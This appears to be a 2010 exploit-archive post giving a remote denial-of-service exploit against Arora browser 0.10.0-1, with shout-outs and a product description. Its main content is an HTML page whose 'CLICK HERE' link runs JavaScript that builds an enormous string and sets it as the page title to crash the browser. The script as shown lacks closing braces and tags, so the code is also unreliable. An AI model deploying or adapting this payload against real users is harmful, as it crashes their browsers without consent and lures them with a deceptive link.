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Arora Browser version 0.10.0-1 remote denial of service exploit
来源:D4rk347[at]yahoo.in 作者:D4rk357 发布时间:2010-07-15  
# Exploit Title: Arora browser Remote Denial fo Service
# Date: 13th july 2010
# Author: D4rk357
# Software Link: http://code.google.com/p/arora/
# Version:0.10.0-1
# Tested on: Windows 7
# category: Windows

Greetz to :b0nd, Fbih2s,rockey killer,The empty(), punter,eberly,prashant
Shoutz to : http://www.garage4hackers.com/forum.php , h4ck3r.in and  all ICW members
Description :Arora is a lightweight cross-platform web browser. 
It's free (as in free speech and free beer). Arora runs on Linux, 
embedded Linux, FreeBSD, Mac OS X, Windows, Haiku, and any other platforms 
supported by the Qt toolkit.
Arora uses the QtWebKit port of the fully standards-compliant WebKit layout engine. 
It features fast rendering, powerful JavaScript engine and supports Netscape plugins. 

----- [ Source Code ] -----

<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">

<script type="text/javascript">
function garbage() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    document.title = buffer2;
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>

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